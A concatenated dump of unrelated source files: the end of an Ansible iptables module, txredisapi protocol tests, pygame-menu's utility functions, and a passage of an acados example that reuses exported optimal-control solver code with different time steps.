# Check if chain option is required
if args['flush'] is False and args['chain'] is None:
module.fail_json(
msg="Either chain or flush parameter must be specified.")
# Flush the table
if args['flush'] is True:
flush_table(iptables_path, module, module.params)
module.exit_json(**args)
# Set the policy
if module.params['policy']:
set_chain_policy(iptables_path, module, module.params)
module.exit_json(**args)
insert = (module.params['action'] == 'insert')
rule_is_present = check_present(iptables_path, module, module.params)
should_be_present = (args['state'] == 'present')
# Check if target is up to date
args['changed'] = (rule_is_present != should_be_present)
# Check only; don't modify
if module.check_mode:
module.exit_json(changed=args['changed'])
# Target is already up to date
if args['changed'] is False:
module.exit_json(**args)
if should_be_present:
if insert:
insert_rule(iptables_path, module, module.params)
else:
append_rule(iptables_path, module, module.params)
else:
remove_rule(iptables_path, module, module.params)
module.exit_json(**args)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
|
tests/test_protocol.py
|
ShadowJonathan/txredisapi
| 104 |
70101
|
<filename>tests/test_protocol.py
# coding: utf-8
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import txredisapi as redis
from twisted.trial import unittest
from twisted.internet.protocol import ClientFactory
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.internet import task
class MockFactory(ClientFactory):
pass
class LineReceiverSubclass(redis.LineReceiver):
def lineReceived(self, line):
self._rcvd_line = line
def rawDataReceived(self, data):
self._rcvd_data = data
class TestLineReciever(unittest.TestCase):
S = six.b('TEST')
def setUp(self):
self.proto = LineReceiverSubclass()
self.transport = StringTransportWithDisconnection()
self.proto.makeConnection(self.transport)
self.transport.protocol = self.proto
self.proto.factory = MockFactory()
def test_excess_line_length(self):
self.assertTrue(self.transport.connected)
self.proto.dataReceived(six.b('\x00') * (self.proto.MAX_LENGTH + 1))
self.assertFalse(self.transport.connected)
def test_excess_delimited_line(self):
self.assertTrue(self.transport.connected)
self.proto.dataReceived(self.S + self.proto.delimiter)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
s = (six.b('\x00') * (self.proto.MAX_LENGTH + 1)) + self.proto.delimiter
self.proto._rcvd_line = None
self.proto.dataReceived(s)
self.assertFalse(self.transport.connected)
self.assertIs(self.proto._rcvd_line, None)
def test_clear_line_buffer(self):
self.proto.dataReceived(self.S)
self.assertEqual(self.proto.clearLineBuffer(), self.S)
def test_send_line(self):
self.proto.dataReceived(self.S + self.proto.delimiter)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
def test_raw_data(self):
clock = task.Clock()
self.proto.callLater = clock.callLater
self.proto.setRawMode()
s = self.S + self.proto.delimiter
self.proto.dataReceived(s)
self.assertEqual(self.proto._rcvd_data, s)
self.proto._rcvd_line = None
self.proto.setLineMode(s)
clock.advance(1)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
self.proto.dataReceived(s)
self.assertEqual(self.proto._rcvd_line, self.S.decode())
def test_sendline(self):
self.proto.sendLine(self.S)
value = self.transport.value()
self.assertEqual(value, self.S + self.proto.delimiter)
class TestBaseRedisProtocol(unittest.TestCase):
def setUp(self):
self._protocol = redis.BaseRedisProtocol()
def test_build_ping(self):
s = self._protocol._build_command("PING")
self.assertEqual(s, six.b('*1\r\n$4\r\nPING\r\n'))
|
pygame_menu/utils.py
|
ppizarror/pygame-menu
| 419 |
70102
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
UTILS
Utility functions.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = [
# Methods
'assert_alignment',
'assert_color',
'assert_cursor',
'assert_list_vector',
'assert_orientation',
'assert_position',
'assert_position_vector',
'assert_vector',
'check_key_pressed_valid',
'fill_gradient',
'format_color',
'get_cursor',
'get_finger_pos',
'is_callable',
'load_pygame_image_file',
'make_surface',
'mouse_motion_current_mouse_position',
'parse_padding',
'print_menu_widget_structure',
'set_pygame_cursor',
'uuid4',
'warn',
'widget_terminal_title',
# Constants
'PYGAME_V2',
# Classes
'TerminalColors'
]
import functools
# import inspect
import sys
import traceback
import types
import uuid
import warnings
import pygame
import pygame_menu
from pygame_menu.locals import ALIGN_CENTER, ALIGN_LEFT, ALIGN_RIGHT, POSITION_CENTER, \
POSITION_NORTH, POSITION_SOUTH, POSITION_SOUTHEAST, POSITION_NORTHWEST, \
POSITION_WEST, POSITION_EAST, POSITION_NORTHEAST, POSITION_SOUTHWEST, \
ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL, FINGERDOWN, FINGERUP, FINGERMOTION
from pygame_menu._types import ColorType, ColorInputType, Union, List, Vector2NumberType, \
NumberType, Any, Optional, Tuple, NumberInstance, VectorInstance, PaddingInstance, \
PaddingType, Tuple4IntType, ColorInputInstance, VectorType, EventType, \
CursorInputInstance, CursorInputType, Tuple2IntType, Dict
PYGAME_V2 = pygame.version.vernum[0] >= 2
WARNINGS_LAST_MESSAGES: Dict[int, bool] = {}
def assert_alignment(align: str) -> None:
"""
Assert that a certain alignment is valid.
:param align: Align value
:return: None
"""
assert isinstance(align, str), f'alignment "{align}" must be a string'
assert align in (ALIGN_LEFT, ALIGN_CENTER, ALIGN_RIGHT), \
f'incorrect alignment value "{align}"'
def assert_color(
color: Union[ColorInputType, List[int]],
warn_if_invalid: bool = True
) -> ColorType:
"""
Assert that a certain color is valid.
:param color: Object color
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Formatted color if valid, else, throws an ``AssertionError`` exception
"""
color = format_color(color, warn_if_invalid=warn_if_invalid)
assert isinstance(color, VectorInstance), \
f'color must be a tuple or list, not type "{type(color)}"'
assert 4 >= len(color) >= 3, \
'color must be a tuple or list of 3 or 4 numbers'
for i in range(3):
assert isinstance(color[i], int), \
f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'
assert 0 <= color[i] <= 255, \
f'"{color[i]}" in element color {color} must be an integer between 0 and 255'
if len(color) == 4:
assert isinstance(color[3], int), \
f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'
assert 0 <= color[3] <= 255, \
f'opacity of color {color} must be an integer between 0 and 255; ' \
f'where 0 is fully-transparent and 255 is fully-opaque'
return color
def assert_cursor(cursor: CursorInputType) -> None:
"""
Assert a given cursor is valid.
:param cursor: Cursor object
:return: None
"""
assert isinstance(cursor, CursorInputInstance), \
'cursor instance invalid, it can be None, an integer, ' \
'or pygame.cursors.Cursor'
def assert_list_vector(list_vector: Union[List[Vector2NumberType], Tuple[Vector2NumberType, ...]],
length: int) -> None:
"""
Assert that a list fixed length vector is numeric.
:param list_vector: Numeric list vector
:param length: Length of the required vector. If ``0`` don't check the length
:return: None
"""
assert isinstance(list_vector, VectorInstance), \
f'list_vector "{list_vector}" must be a tuple or list'
for v in list_vector:
assert_vector(v, length)
def assert_orientation(orientation: str) -> None:
"""
Assert that a certain widget orientation is valid.
:param orientation: Object orientation
:return: None
"""
assert isinstance(orientation, str), \
f'orientation "{orientation}" must be a string'
assert orientation in (ORIENTATION_HORIZONTAL, ORIENTATION_VERTICAL), \
f'invalid orientation value "{orientation}"'
def assert_position(position: str) -> None:
"""
Assert that a certain position is valid.
:param position: Object position
:return: None
"""
assert isinstance(position, str), \
f'position "{position}" must be a string'
assert position in (POSITION_WEST, POSITION_SOUTHWEST, POSITION_SOUTH,
POSITION_SOUTHEAST, POSITION_EAST, POSITION_NORTH,
POSITION_NORTHWEST, POSITION_NORTHEAST, POSITION_CENTER), \
f'invalid position value "{position}"'
def assert_position_vector(position: Union[str, List[str], Tuple[str, ...]]) -> None:
"""
Assert that a position vector is valid.
:param position: Object position
:return: None
"""
if isinstance(position, str):
assert_position(position)
else:
assert isinstance(position, VectorInstance)
unique = []
for pos in position:
assert_position(pos)
if pos not in unique:
unique.append(pos)
assert len(unique) == len(position), 'there cannot be repeated positions'
def assert_vector(
num_vector: VectorType,
length: int,
instance: type = NumberInstance
) -> None:
"""
Assert that a fixed length vector is numeric.
:param num_vector: Numeric vector
:param length: Length of the required vector. If ``0`` don't check the length
:param instance: Instance of each item of the vector
:return: None
"""
assert isinstance(num_vector, VectorInstance), \
f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'
if length != 0:
assert len(num_vector) == length, \
f'vector "{num_vector}" must contain {length} numbers only, ' \
f'but {num_vector} were given'
for i in range(len(num_vector)):
num = num_vector[i]
if instance == int and isinstance(num, float) and int(num) == num:
num = int(num)
assert isinstance(num, instance), \
f'item {num} of vector must be {instance}, not type "{type(num)}"'
def check_key_pressed_valid(event: EventType) -> bool:
"""
Checks if the pressed key is valid.
:param event: Key press event
:return: ``True`` if a key is pressed
"""
# If the system detects that any key event has been pressed but
# there's not any key pressed then this method raises a KEYUP
# flag
bad_event = not (True in pygame.key.get_pressed())
if bad_event:
if 'test' in event.dict and event.dict['test']:
return True
ev = pygame.event.Event(pygame.KEYUP, {'key': event.key})
pygame.event.post(ev)
return not bad_event
def fill_gradient(
surface: 'pygame.Surface',
color: ColorInputType,
gradient: ColorInputType,
rect: Optional['pygame.Rect'] = None,
vertical: bool = True,
forward: bool = True
) -> None:
"""
Fill a surface with a gradient pattern.
:param surface: Surface to fill
:param color: Starting color
:param gradient: Final color
:param rect: Area to fill; default is surface's rect
:param vertical: True=vertical; False=horizontal
:param forward: True=forward; False=reverse
:return: None
"""
if rect is None:
rect = surface.get_rect()
x1, x2 = rect.left, rect.right
y1, y2 = rect.top, rect.bottom
color = assert_color(color)
gradient = assert_color(gradient)
if vertical:
h = y2 - y1
else:
h = x2 - x1
if forward:
a, b = color, gradient
else:
b, a = color, gradient
rate = (
float(b[0] - a[0]) / h,
float(b[1] - a[1]) / h,
float(b[2] - a[2]) / h
)
fn_line = pygame.draw.line
if vertical:
for line in range(y1, y2):
color = (
min(max(a[0] + (rate[0] * (line - y1)), 0), 255),
min(max(a[1] + (rate[1] * (line - y1)), 0), 255),
min(max(a[2] + (rate[2] * (line - y1)), 0), 255)
)
fn_line(surface, color, (x1, line), (x2, line))
else:
for col in range(x1, x2):
color = (
min(max(a[0] + (rate[0] * (col - x1)), 0), 255),
min(max(a[1] + (rate[1] * (col - x1)), 0), 255),
min(max(a[2] + (rate[2] * (col - x1)), 0), 255)
)
fn_line(surface, color, (col, y1), (col, y2))
def format_color(
color: Union[ColorInputType, Any],
warn_if_invalid: bool = True
) -> Union[ColorType, Any]:
"""
Format color from string, int, or tuple to tuple type.
Available formats:
- Color name str: name of the color to use, e.g. ``"red"`` (all the supported name strings can be found in the colordict module, see https://github.com/pygame/pygame/blob/main/src_py/colordict.py)
- HTML color format str: ``"#rrggbbaa"`` or ``"#rrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- Hex number str: ``"0xrrggbbaa"`` or ``"0xrrggbb"``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, the aa (alpha) value defaults to ``0xFF`` if not provided
- int: int value of the color to use, using hex numbers can make this parameter more readable, e.g. ``0xrrggbbaa``, where rr, gg, bb, and aa are 2-digit hex numbers in the range of ``0x00`` to ``0xFF`` inclusive, note that the aa (alpha) value is not optional for the int format and must be provided
- tuple/list of int color values: ``(R, G, B, A)`` or ``(R, G, B)``, where R, G, B, and A are int values in the range of ``0`` to ``255`` inclusive, the A (alpha) value defaults to ``255`` (opaque) if not provided
:param color: Color to format. If format is valid returns the same input value
:param warn_if_invalid: If ``True`` warns if the color is invalid
:return: Color in (r, g, b, a) format
"""
if not isinstance(color, ColorInputInstance):
return color
if not isinstance(color, pygame.Color):
try:
if isinstance(color, VectorInstance) and 3 <= len(color) <= 4:
if PYGAME_V2:
for j in color:
if not isinstance(j, int):
raise ValueError('color cannot contain floating point values')
c = pygame.Color(*color)
else:
c = pygame.Color(color)
except ValueError:
if warn_if_invalid:
warn(f'invalid color value "{color}"')
else:
raise
return color
else:
c = color
return c.r, c.g, c.b, c.a
def get_cursor() -> CursorInputType:
"""
Return the pygame cursor object.
:return: Cursor object
"""
try:
return pygame.mouse.get_cursor()
except TypeError as e:
warn(str(e))
return None
def get_finger_pos(menu: 'pygame_menu.Menu', event: EventType) -> Tuple2IntType:
"""
Return the position from finger (or mouse) event on x-axis and y-axis (x, y).
:param menu: Menu object for relative positioning in finger events
:param event: Pygame event object
:return: Position on x-axis and y-axis (x, y) in px
"""
if event.type in (FINGERDOWN, FINGERMOTION, FINGERUP):
assert menu is not None, \
'menu reference cannot be none while using finger position'
display_size = menu.get_window_size()
finger_pos = (int(event.x * display_size[0]), int(event.y * display_size[1]))
return finger_pos
return event.pos
def is_callable(func: Any) -> bool:
"""
Return ``True`` if ``func`` is callable.
:param func: Function object
:return: ``True`` if function
"""
# noinspection PyTypeChecker
return isinstance(func, (types.FunctionType, types.BuiltinFunctionType,
types.MethodType, functools.partial))
def load_pygame_image_file(image_path: str, **kwargs) -> 'pygame.Surface':
"""
Loads an image and returns a surface.
:param image_path: Image file
:param kwargs: Optional keyword arguments
:return: Surface
"""
# Try to load the image
try:
if 'test' in kwargs.keys():
raise pygame.error('File is not a Windows BMP file')
surface = pygame.image.load(image_path)
except pygame.error as exc:
# Check if file is not a windows file
if str(exc) == 'File is not a Windows BMP file':
pil_invalid_exception = Exception
# Check if Pillow exists
try:
# noinspection PyPackageRequirements
from PIL import Image, UnidentifiedImageError
pil_invalid_exception = UnidentifiedImageError
img_pil = Image.open(image_path)
surface = pygame.image.fromstring(
img_pil.tobytes(), img_pil.size, img_pil.mode).convert()
except (ModuleNotFoundError, ImportError):
warn(f'Image file "{image_path}" could not be loaded, as pygame.error '
f'is raised. To avoid this issue install the Pillow library')
raise
except pil_invalid_exception:
warn(f'The image "{image_path}" could not be loaded using Pillow')
raise
else:
raise
return surface
def make_surface(
width: NumberType,
height: NumberType,
alpha: bool = False,
fill_color: Optional[ColorInputType] = None
) -> 'pygame.Surface':
"""
Creates a pygame surface object.
:param width: Surface width
:param height: Surface height
:param alpha: Enable alpha channel on surface
:param fill_color: Fill surface with a certain color
:return: Pygame surface
"""
assert isinstance(width, NumberInstance)
assert isinstance(height, NumberInstance)
assert isinstance(alpha, bool)
assert width >= 0 and height >= 0, \
'surface width and height must be equal or greater than zero'
surface = pygame.Surface((int(width), int(height)), pygame.SRCALPHA, 32) # lgtm [py/call/wrong-arguments]
if alpha:
# noinspection PyArgumentList
surface = pygame.Surface.convert_alpha(surface)
if fill_color is not None:
fill_color = assert_color(fill_color)
surface.fill(fill_color)
return surface
def mouse_motion_current_mouse_position() -> EventType:
"""
Return a pygame event type MOUSEMOTION in the current mouse position.
:return: Event
"""
x, y = pygame.mouse.get_pos()
return pygame.event.Event(pygame.MOUSEMOTION, {'pos': (int(x), int(y))})
def parse_padding(padding: PaddingType) -> Tuple4IntType:
"""
Get the padding value from tuple.
- If an integer or float is provided: top, right, bottom and left values will be the same
- If 2-item tuple is provided: top and bottom takes the first value, left and right the second
- If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third
- If 4-item tuple is provided: padding will be (top, right, bottom, left)
.. note::
See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding.
:param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style
:return: Padding value, (top, right, bottom, left), in px
"""
if padding is False or None:
padding = 0
assert isinstance(padding, PaddingInstance)
if isinstance(padding, NumberInstance):
assert padding >= 0, 'padding cannot be a negative number'
return int(padding), int(padding), int(padding), int(padding)
else:
assert 1 <= len(padding) <= 4, 'padding must be a tuple of 2, 3 or 4 elements'
for i in range(len(padding)):
assert isinstance(padding[i], NumberInstance), \
'all padding elements must be integers or floats'
assert padding[i] >= 0, \
'all padding elements must be equal or greater than zero'
if len(padding) == 1:
return int(padding[0]), int(padding[0]), int(padding[0]), int(padding[0])
elif len(padding) == 2:
return int(padding[0]), int(padding[1]), int(padding[0]), int(padding[1])
elif len(padding) == 3:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[1])
else:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[3])
def print_menu_widget_structure(
widgets: List['pygame_menu.widgets.Widget'],
index: int
) -> None:
"""
Test printing widgets order.
.. note::
- Φ Floating status
- ⇇ Selected
- !▲ Widget is not appended to current menu
- ╳ Widget is hidden
- ∑ Scrollable frame sizing
- β Widget is not selectable
- {x,y} Widget *column, row* position
- <x,y> Frame indices (min, max)
:param widgets: Menu widgets list
:param index: Menu index
:return: None
"""
indx = 0
current_depth = 0
depth_widths = {}
c = TerminalColors
def close_frames(depth: int) -> None:
"""
Close frames up to current depth.
:param depth: Depth to close
:return: None
"""
d = current_depth - depth
for i in range(d):
j = depth + d - (i + 1) # Current depth
line = f'· {"│ " * j}└{"┄" * 3}' # * depth_widths[j]
print(c.BRIGHT_WHITE + line.ljust(0, '━') + c.ENDC) # 80 also work
non_menu_frame_widgets: Dict[int, List['pygame_menu.widgets.Widget']] = {}
def process_non_menu_frame(w_indx: int) -> None:
"""
Print non-menu frames list.
:param w_indx: Current iteration index to print widgets
:return: None
"""
for nmi in list(non_menu_frame_widgets.keys()):
if nmi == w_indx:
v = non_menu_frame_widgets[nmi]
for v_wid in v:
print(c.BRIGHT_WHITE + '· ' + '│ ' * v_wid.get_frame_depth()
+ c.ENDC + widget_terminal_title(v_wid))
del non_menu_frame_widgets[nmi]
for w in widgets:
w_depth = w.get_frame_depth()
close_frames(w.get_frame_depth())
title = widget_terminal_title(w, indx, index)
print('{0}{1}{2}'.format(
str(indx).ljust(3),
' ' + c.BRIGHT_WHITE + '│ ' * w_depth + c.ENDC,
title
))
if w_depth not in depth_widths.keys():
depth_widths[w_depth] = 0
# depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth])
depth_widths[w_depth] = len(title) - 2
current_depth = w.get_frame_depth()
process_non_menu_frame(indx)
jw = widgets[0]
try:
if isinstance(w, pygame_menu.widgets.Frame): # Print ordered non-menu widgets
current_depth += 1
prev_indx = indx
for jw in w.get_widgets(unpack_subframes=False):
if jw.get_menu() is None or jw not in widgets:
if prev_indx not in non_menu_frame_widgets.keys():
non_menu_frame_widgets[prev_indx] = []
non_menu_frame_widgets[prev_indx].append(jw)
else:
prev_indx = widgets.index(jw)
except ValueError as e:
print(f'[ERROR] while requesting widget {jw.get_class_id()}')
warn(str(e))
indx += 1
process_non_menu_frame(indx)
close_frames(0)
def set_pygame_cursor(cursor: CursorInputType) -> None:
"""
Set pygame cursor.
:param cursor: Cursor object
:return: None
"""
try:
if cursor is not None:
# noinspection PyArgumentList
pygame.mouse.set_cursor(cursor)
except (pygame.error, TypeError):
if PYGAME_V2:
warn(f'could not establish widget cursor, invalid value {cursor}')
def uuid4(short: bool = False) -> str:
"""
Create custom version of uuid4.
:param short: If ``True`` only returns the first 8 chars of the uuid, else, 18
:return: UUID of 18 chars
"""
return str(uuid.uuid4())[:18 if not short else 8]
def warn(message: str, print_stack: bool = True) -> None:
"""
Warnings warn method.
:param message: Message to warn about
:param print_stack: Print stack trace of the call
:return: None
"""
assert isinstance(message, str)
# noinspection PyUnresolvedReferences,PyProtectedMember
frame = sys._getframe().f_back
# frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index)
# Check if message in dict
msg_hash = hash(message)
msg_in_hash = False
try:
msg_in_hash = WARNINGS_LAST_MESSAGES[msg_hash]
except KeyError:
pass
if not msg_in_hash and print_stack:
traceback.print_stack(frame, limit=5)
WARNINGS_LAST_MESSAGES[msg_hash] = True
# warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1])
warnings.warn(message, stacklevel=2)
def widget_terminal_title(
widget: 'pygame_menu.widgets.Widget',
widget_index: int = -1,
current_index: int = -1
) -> str:
"""
Return widget title to be printed on terminals.
:param widget: Widget to get title from
:param widget_index: Widget index
:param current_index: Menu index
:return: Widget title
"""
w_class_id = TerminalColors.BOLD + widget.get_class_id() + TerminalColors.ENDC
if isinstance(widget, pygame_menu.widgets.Frame):
w_title = TerminalColors.BRIGHT_WHITE + '┌━' + TerminalColors.ENDC
w_title += f'{0} - {3}[{1},{2},'.format(w_class_id, *widget.get_indices(), TerminalColors.LGREEN)
if widget.horizontal:
w_title += 'H] '
else:
w_title += 'V] '
if widget.is_scrollable:
wsz = widget.get_inner_size()
wsm = widget.get_max_size()
wsh = wsm[0] if wsm[0] == wsz[0] else f'{wsm[0]}→{wsz[0]}'
wsv = wsm[1] if wsm[1] == wsz[1] else f'{wsm[1]}→{wsz[1]}'
w_title += f'∑ [{wsh},{wsv}] '
w_title += TerminalColors.ENDC
else:
if widget.get_title() != '':
title_f = TerminalColors.UNDERLINE + widget.get_title() + TerminalColors.ENDC
w_title = f'{w_class_id} - {title_f} - '
else:
w_title = w_class_id + ' - '
# Column/Row position
w_title += TerminalColors.INDIGO
cr = widget.get_col_row_index()
w_title += '{' + str(cr[0]) + ',' + str(cr[1]) + '}'
w_title += TerminalColors.ENDC
# Add position
w_title += TerminalColors.MAGENTA
w_title += ' ({0},{1})'.format(*widget.get_position())
w_title += TerminalColors.ENDC
# Add size
w_title += TerminalColors.BLUE
w_title += ' ({0},{1})'.format(*widget.get_size())
w_title += TerminalColors.ENDC
# Add mods
w_title += TerminalColors.CYAN
if widget.is_floating():
w_title += ' Φ'
if not widget.is_visible():
w_title += ' ╳'
if not widget.is_selectable:
w_title += ' β'
if widget.is_selected():
w_title += TerminalColors.BOLD + ' ⟵'
if current_index != -1 and current_index != widget_index:
w_title += f'! [{widget_index}->{current_index}]'
if widget.get_menu() is None:
w_title += ' !▲'
w_title += TerminalColors.ENDC
return w_title
class TerminalColors(object):
"""
Terminal colors.
See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html.
"""
BLUE = '\u001b[38;5;27m'
BOLD = '\033[1m'
BRIGHT_MAGENTA = '\u001b[35;1m'
BRIGHT_WHITE = '\u001b[37;1m'
CYAN = '\u001b[36m'
ENDC = '\u001b[0m'
GRAY = '\u001b[30;1m'
INDIGO = '\u001b[38;5;129m'
LGREEN = '\u001b[38;5;150m'
MAGENTA = '\u001b[35m'
RED = '\u001b[31m'
UNDERLINE = '\033[4m'
|
examples/acados_python/getting_started/ocp/minimal_example_ocp_reuse_code.py
|
schwieni/acados
| 322 |
70109
|
# Minimal example showing how to reuse the exported c-code with
# different time-steps.
#
# There are two use-cases demonstrated here. One use-case is to change
# the length of the time-stamp vector (this results in a different
# N). Another use-case is to change the final time but keep the number
# of shooting nodes identical. Reusing the exported code with variing
# N can be useful especially in a c-only application where the process
# of code-generation should only be done once.
#
# This example is an extension of the 'minimal_example_ocp.py' example.
#
# Copyright 2021 <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
import os
import sys
sys.path.insert(0, '../common')
from acados_template import AcadosOcp, AcadosOcpSolver
from pendulum_model import export_pendulum_ode_model
import numpy as np
import scipy.linalg
from utils import plot_pendulum
print('This example demonstrates 2 use-cases for reuse of the code export.')
# create ocp object to formulate the OCP
ocp = AcadosOcp()
# set model
model = export_pendulum_ode_model()
ocp.model = model
nx = model.x.size()[0]
nu = model.u.size()[0]
ny = nx + nu
ny_e = nx
# define the different options for the use-case demonstration
N0 = 20 # original number of shooting nodes
N12 = 15 # change the number of shooting nodes for use-cases 1 and 2
Tf_01 = 1.0 # original final time and for use-case 1
Tf_2 = Tf_01 * 0.7 # change final time for use-case 2 (but keep N identical)
# set dimensions
ocp.dims.N = N0
# set cost
Q = 2 * np.diag([1e3, 1e3, 1e-2, 1e-2])
R = 2 * np.diag([1e-2])
ocp.cost.W_e = Q
ocp.cost.W = scipy.linalg.block_diag(Q, R)
ocp.cost.cost_type = 'LINEAR_LS'
ocp.cost.cost_type_e = 'LINEAR_LS'
ocp.cost.Vx = np.zeros((ny, nx))
ocp.cost.Vx[:nx, :nx] = np.eye(nx)
Vu = np.zeros((ny, nu))
Vu[4, 0] = 1.0
ocp.cost.Vu = Vu
ocp.cost.Vx_e = np.eye(nx)
ocp.cost.yref = np.zeros((ny,))
ocp.cost.yref_e = np.zeros((ny_e,))
# set constraints
Fmax = 80
ocp.constraints.lbu = np.array([-Fmax])
ocp.constraints.ubu = np.array([+Fmax])
ocp.constraints.idxbu = np.array([0])
ocp.constraints.x0 = np.array([0.0, np.pi, 0.0, 0.0])
# set options
ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' # FULL_CONDENSING_QPOASES
# PARTIAL_CONDENSING_HPIPM, FULL_CONDENSING_QPOASES, FULL_CONDENSING_HPIPM,
# PARTIAL_CONDENSING_QPDUNES, PARTIAL_CONDENSING_OSQP
ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'
ocp.solver_options.integrator_type = 'ERK'
# ocp.solver_options.print_level = 1
ocp.solver_options.nlp_solver_type = 'SQP' # SQP_RTI, SQP
# set prediction horizon
ocp.solver_options.tf = Tf_01
print(80*'-')
print('generate code and compile...')
ocp_solver = AcadosOcpSolver(ocp, json_file='acados_ocp.json')
# --------------------------------------------------------------------------------
# 0) solve the problem defined here (original from code export), analog to 'minimal_example_ocp.py'
simX0 = np.ndarray((N0 + 1, nx))
simU0 = np.ndarray((N0, nu))
print(80*'-')
print(f'solve original code with N = {N0} and Tf = {Tf_01} s:')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N0):
simX0[i, :] = ocp_solver.get(i, "x")
simU0[i, :] = ocp_solver.get(i, "u")
simX0[N0, :] = ocp_solver.get(N0, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
# plot but don't halt
plot_pendulum(np.linspace(0, Tf_01, N0 + 1), Fmax, simU0, simX0, latexify=False, plt_show=False, X_true_label=f'original: N={N0}, Tf={Tf_01}')
# --------------------------------------------------------------------------------
# 1) now reuse the code but set a new time-steps vector, with a new number of elements
dt1 = Tf_01 / N12
new_time_steps1 = np.tile(dt1, (N12,)) # Matlab's equivalent to repmat
time1 = np.hstack([0, np.cumsum(new_time_steps1)])
simX1 = np.ndarray((N12 + 1, nx))
simU1 = np.ndarray((N12, nu))
ocp_solver.set_new_time_steps(new_time_steps1)
print(80*'-')
print(f'solve use-case 1 with N = {N12} (instead of {N0}) and Tf = {Tf_01} s:')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N12):
simX1[i, :] = ocp_solver.get(i, "x")
simU1[i, :] = ocp_solver.get(i, "u")
simX1[N12, :] = ocp_solver.get(N12, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
